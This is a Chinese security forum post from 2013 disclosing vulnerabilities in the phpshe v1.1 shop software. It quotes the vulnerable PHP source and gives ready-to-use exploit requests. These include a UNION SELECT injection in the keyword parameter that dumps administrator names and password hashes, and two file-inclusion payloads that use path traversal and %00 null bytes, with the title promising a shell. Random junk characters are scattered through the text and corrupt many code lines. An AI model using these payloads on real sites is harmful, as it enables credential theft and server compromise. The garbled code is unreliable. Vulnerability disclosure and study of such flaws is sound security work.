中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]
作者: admin    时间: 2013-4-16 16:45
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/# q( G+ q; {6 V  f  J# K  G
/* Phpshe v1.1 Vulnerability% ]' j! Z; w( P* A
/* ========================
4 Q3 I, y: ?  R7 f/* By: : Kn1f3
: C( r0 i* n, _1 N5 I/* E-Mail : 681796@qq.com2 J9 Y% W1 y) @" W; X: S
/*******************************************************/
. l' I9 m( |0 V& j) M0×00 整体大概参数传输! J- E# U: y+ S0 ^) d0 `, s: C' Z
/ S. r6 _' b/ @. |7 V# q

" u9 V& F% g. q7 ]8 Q& d
! R, N" n9 N8 q4 A//common.php
6 x3 v* Y  H( c4 w9 @$ e: ~if (get_magic_quotes_gpc()) {) K8 F" h  A" i" R9 A: t3 ?
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
+ t8 a7 f+ I1 C# _2 m0 p!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
) D, ?* G! ]- X5 f, H6 e}/ d8 M; p+ {/ t
else {+ b5 j3 X1 c- r( l
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
4 W" K. ?& H$ }% v, v!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
! \! g# f; M3 f8 @6 A  W9 E}* c+ r! m; |5 @' _2 _1 l- V/ _; ?
session_start();
6 f, h* G7 y% k7 a& b# r8 z!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
- c( A5 g* I% h+ C* M- @!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
  t" G& l; ?7 n3 R  F! D1 d
) V+ J4 {' L6 g0×01 包含漏洞
4 f( l! X/ P+ H; J$ N
& A. i9 Z; U* y3 t/ n9 w" H: h
6 O/ h0 E' t  G' J' i//首页文件0 z8 ^+ z% x$ R1 W! v
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);; ?- Y, h2 q3 N0 A' {" O5 L0 W
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
8 t# U( Q3 T+ P$ c+ D$ |8 `# [pe_result();
: W: x  z% \% Q- \0 p?>
( N, z& T+ Y: D9 `  b" X) ^//common 文件 第15行开始
7 r% H( {1 T; O! J1 G) z! Surl路由配置
% U: E, L, E7 w( u8 U$module = $mod = $act = 'index';
2 ]; v, M3 J7 L9 C1 u$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
+ E' g" f9 _( [. p6 C# S6 a$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);1 \% C7 R" n& u. M- M/ s
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
: ^* c$ O3 C* w# O! a//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
% p% a( }" m& P  Y/ t

! B2 ?( w6 n% Q$ Z2 [
7 P- u* e" B/ `$ ^
0×02 搜索注入
, B" j: [( i0 [" W
! x( ^. [0 U/ o" h4 s( e6 ]5 U<code id="code2">

//product.php文件' ?+ s, Y: S2 N. Y! j+ I+ Q* H7 L0 k
case 'list':
1 V  p+ E% O1 p1 u0 R7 W$category_id = intval($id);
2 M$ b% F. `( m) M4 _7 z& o! N$ V4 ^$info = $db->pe_select('category', array('category_id'=>$category_id));. |+ m0 h$ R0 K
//搜索7 _8 D; r& k: Z
$sqlwhere = " and `product_state` = 1";% O2 L" S; W8 j, }( E9 K
pe_lead('hook/category.hook.php');
: L3 o2 c7 o. W3 E1 j$ ^  Fif ($category_id) {
- q7 q" e& ~9 c/ q% a. {where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";/ q: d; ?$ p6 X. c! d2 b+ o
}7 I4 N# P5 O7 L/ b
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
, V1 E% i5 {$ @6 |5 Kif ($_g_orderby) {* Z' x" g  V! x9 G$ W2 \
$orderby = explode('_', $_g_orderby);  \( ~6 i  P2 ~- C" ~
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
9 b$ I, ?7 ]( b( H, t- Q}# B6 O% T1 o$ d  B3 w
else {
& q6 a% D* p- e0 @) S$ [+ y# S$sqlwhere .= " order by `product_id` desc";
+ d  w' ^3 l  E( N" G- C}/ n+ D- W$ B( z6 @0 P# T9 e6 e
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));- U. |0 Y: @% ?9 G6 O
//热卖排行  U! o0 D2 w$ t/ h5 y% w. q
$product_hotlist = product_hotlist();
3 ?2 U$ }8 T" f3 ^//当前路径5 S8 l0 |5 W! a* L  [/ ~# r
$nowpath = category_path($category_id);
* k) ^" ?4 g7 R- ]- ~4 T  B; ^$seo = pe_seo($info['category_name']);$ E! Q9 p( _0 |9 Q
include(pe_tpl('product_list.html'));9 _3 R7 ?2 K6 R
//跟进selectall函数库
5 C& J8 A8 P- V' q0 r+ C) B: Dpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array()); f& o) ?- Z1 u8 B
{9 t+ V5 H% |' e. v! X
//处理条件语句
: s8 q( H# x$ G$sqlwhere = $this->_dowhere($where);  R: z; y$ j. `
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
9 \8 B$ y, [* ^1 [+ w& I! W}( P" \: i0 Q5 o9 Q5 v
//exp
1 ^  w+ _2 P! v; X) Jproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
6 r& ]2 J  r" d' @6 R7 I

</code>. t$ b2 m7 }% p7 d: b

1 v: O# M2 Q2 t, `0×03 包含漏洞21 X$ l3 z5 [1 }5 @$ _
4 L: Z. ^) a# |. S7 L+ O
<code id="code3">

//order.php

case 'pay':


6 ]; K& l* _1 v* _1 `$order_id = pe_dbhold($_g_id);

% s2 C& G. L! Y& N, o* T/ }
$cache_payway = cache::get('payway');


4 [+ r3 _% c0 d& g$ Aforeach($cache_payway as $k => $v) {


0 e+ y) g3 r: {0 B; P) P$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

+ C. f/ P0 i& f" @; ~1 j/ _
if ($k == 'bank') {


& Z9 Q+ B  l- [# d/ u! s% T. ^) r9 W$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

- U% a. M/ W) P7 F! C! k
}


7 @' Q9 M  p" J/ ^$ `% G}

0 C% ]0 d. m/ l8 g
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

# y2 A" e7 [1 M7 A% _
!$order['order_id'] && pe_error('订单号错误...');


/ u" \( t5 j: ^; G# E* t  [5 xif (isset($_p_pesubmit)) {

# r$ n# ~% b2 i
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

+ u' _' E/ s. |' @3 C; }
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


# t& z& N1 ]" ^: d( C8 _8 Fforeach ($info_list as $v) {


% D  W: l! A( F1 {* |, v; g$order['order_name'] .= "{$v['product_name']};";$ N" _" H8 H9 i' t8 I3 u$ {


3 o6 K( p/ @7 W6 o9 A& j}

! r. ]" p; r% H
echo '正在为您连接支付网站,请稍后...';


/ _: H  t. M1 T% Binclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


- r3 c, Y# W2 J8 f; |& S}//当一切准备好的时候就可以进行"鸡肋包含了"


! ~- X# B5 ~. {else {

  R% G' C, E3 q% j
pe_error('支付错误...');

. J; r9 S5 C& U
}

. f3 H% j. g4 v/ A6 t6 ]
}

$ l! V: P3 \7 x* o; r/ v, T/ _( X
$seo = pe_seo('选择支付方式');


, `2 B8 }) D& R# C0 a8 Winclude(pe_tpl('order_pay.html'));

- A5 Y; ]* C1 ?. A
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
8 X0 }, H) z3 k; Y" }6 Chttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2